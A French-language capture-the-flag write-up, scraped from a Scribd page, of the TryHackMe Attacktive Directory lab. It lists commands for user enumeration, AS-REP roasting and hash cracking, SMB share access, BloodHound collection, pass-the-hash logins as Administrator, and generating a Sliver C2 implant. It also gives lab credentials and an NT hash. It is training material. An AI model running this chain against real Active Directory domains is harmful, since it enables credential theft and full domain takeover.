Scribd Logo
Upload

Welcome to Scribd!

  • Attackive Directory

    Uploaded by

    pikafou34
    17 views6 pages
    Impacket is a collection of Python classes for working with network protocols. It was formerly hosted by SecureAuth but is now maintained by Fortra. It allows interacting with various protocols like SMB, HTTP, LDAP, Kerberos and more.

    Original Description:

    Attack AD Guide

    Original Title

    Attackive_Directory

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Impacket is a collection of Python classes for working with network protocols. It was formerly hosted by SecureAuth but is now maintained by Fortra. It allows interacting with various protocols like SMB, HTTP, LDAP, Kerberos and more.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    17 views6 pages

    Attackive Directory

    Uploaded by

    pikafou34
    Impacket is a collection of Python classes for working with network protocols. It was formerly hosted by SecureAuth but is now maintained by Fortra. It allows interacting with various protocols like SMB, HTTP, LDAP, Kerberos and more.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 6

    Scripts Imapckets et leurs utilités : Impacket

    Impacket is a collection of Python classes for working with network protocols.


    Formerly hosted by SecureAuth, Impacket is now maintained by Fortra.
    SHELL

    PORT STATE SERVICE VERSION


    53/tcp open domain Simple DNS Plus
    80/tcp open http Microsoft IIS httpd 10.0
    |_http-server-header: Microsoft-IIS/10.0
    |_http-title: IIS Windows Server
    | http-methods:
    |_ Potentially risky methods: TRACE
    88/tcp open kerberos-sec Microsoft Windows Kerberos
    (server time: 2023-09-18 19:21:02Z)
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn Microsoft Windows netbios-ssn
    389/tcp open ldap Microsoft Windows Active
    Directory LDAP (Domain: spookysec.local0., Site: Default-
    First-Site-Name)
    445/tcp open microsoft-ds?
    464/tcp open kpasswd5?
    593/tcp open ncacn_http Microsoft Windows RPC over HTTP
    1.0
    636/tcp open tcpwrapped
    3268/tcp open ldap Microsoft Windows Active
    Directory LDAP (Domain: spookysec.local0., Site: Default-
    First-Site-Name)
    3269/tcp open tcpwrapped
    3389/tcp open ms-wbt-server Microsoft Terminal Services
    | ssl-cert: Subject:
    commonName=AttacktiveDirectory.spookysec.local
    | Not valid before: 2023-09-17T19:16:45
    |_Not valid after: 2024-03-18T19:16:45
    |_ssl-date: 2023-09-18T19:21:59+00:00; +31s from scanner time.
    | rdp-ntlm-info:
    | Target_Name: THM-AD
    | NetBIOS_Domain_Name: THM-AD
    | NetBIOS_Computer_Name: ATTACKTIVEDIREC
    | DNS_Domain_Name: spookysec.local
    | DNS_Computer_Name: AttacktiveDirectory.spookysec.local
    | Product_Version: 10.0.17763
    |_ System_Time: 2023-09-18T19:21:51+00:00
    5985/tcp open http Microsoft HTTPAPI httpd 2.0
    (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    9389/tcp open mc-nmf .NET Message Framing
    47001/tcp open http Microsoft HTTPAPI httpd 2.0
    (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Not Found
    49664/tcp open msrpc Microsoft Windows RPC
    49665/tcp open msrpc Microsoft Windows RPC
    49666/tcp open msrpc Microsoft Windows RPC
    49669/tcp open ncacn_http Microsoft Windows RPC over HTTP
    1.0
    49670/tcp open msrpc Microsoft Windows RPC
    49671/tcp open msrpc Microsoft Windows RPC
    49673/tcp open msrpc Microsoft Windows RPC
    49677/tcp open msrpc Microsoft Windows RPC
    49682/tcp open msrpc Microsoft Windows RPC
    49694/tcp open msrpc Microsoft Windows RPC
    Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE:
    cpe:/o:microsoft:windows

    Host script results:


    | smb2-security-mode:
    | 311:
    |_ Message signing enabled and required
    |_clock-skew: mean: 30s, deviation: 0s, median: 30s
    | smb2-time:
    | date: 2023-09-18T19:21:54
    |_ start_date: N/A

    spookysec.local -> /etc/hosts


    ATTACKTIVEDIREC.spookysec.local

    SHELL

    S-1-5-21-3591857110-2884097990-301047963
    Explication du protocole kerberos
    https://beta.hackndo.com/kerberos/
    https://github.com/ropnop/kerbrute
    https://raw.githubusercontent.com/Orange-Cyberdefense/ocd-
    mindmaps/12341b224aaa2da121cde02651f94c52945156cb/img/pentest_ad_dark
    _2023_02.svg

    SHELL

    kerbrute userenum -d "spookysec.local" userlist.txt --dc


    ATTACKTIVEDIREC.spookysec.local

    SHELL

    GetNPUsers.py -request -format hashcat -outputfile


    ASREProastables.txt -usersfile userlist.txt -dc-ip
    "ATTACKTIVEDIREC.spookysec.local" "spookysec.local"/
    james

    .\hashcat.exe -m 18200 .\hash.txt .\rockyou.txt


    management2005

    SHELL

    svc-admin:management2005

    Énumération des partages smb (server message block) :

    SHELL

    crackmapexec smb 10.10.196.242 -u svc-admin -p


    'management2005' --shares
    SHELL

    smbclient.py "spookysec.local"/"svc-
    admin":"management2005"@"ATTACKTIVEDIREC.spookysec.local"

    -> Récupération d'un fichier txt

    Décodage avec CyberChef

    backup@spookysec.local:backup2517860

    Bloodhound
    Guide d'utilisation de Bloodhound CE :

    https://bloodhound.readthedocs.io/en/latest/data-analysis/bloodhound-
    gui.html
    https://bloodhound.readthedocs.io/en/latest/data-analysis/nodes.html
    https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html

    SHELL

    ### Démarrage de la base neo4j


    $ neo4j start
    # ou
    $ neo4j console
    ### Bloodhound

    # Récupération des infos


    $ bloodhound-python -c All -u svc-admin -p management2005 -d
    spookysec.local -ns 10.10.196.242
    # Ou
    $ SharpHound.exe (Version PowerShell)

    ## Importer les données sur bloodhound


    Récupération d'un accès à distance
    SHELL

    $ evil-winrm -u Administrator -H
    0e0363213e37b94221497260b0bcb4fc -i 10.10.196.242 # Accès en
    tant que utilisateur Administrator
    psexec.py -hashes :"0e0363213e37b94221497260b0bcb4fc"
    "SPOOKYSEC.LOCAL"/"Administrator"@"10.10.196.242" # Accès en
    tant que NT/Authority System

    Commandes intéressantes à exec (hors contexte de la room


    de THM)
    SHELL

    crackmapexec smb 10.10.196.242 -u svc-admin -p


    'management2005' --shares -M gpp_password

    Commandes sliver
    SHELL

    ## Démarrage du service
    sliver-server
    ## Écoute en mtls
    [server] sliver > mtls
    ## Génération d'un implant
    [server] sliver > generate --mtls LHOST --save
    /path/2/save/implant --os Windows

    You might also like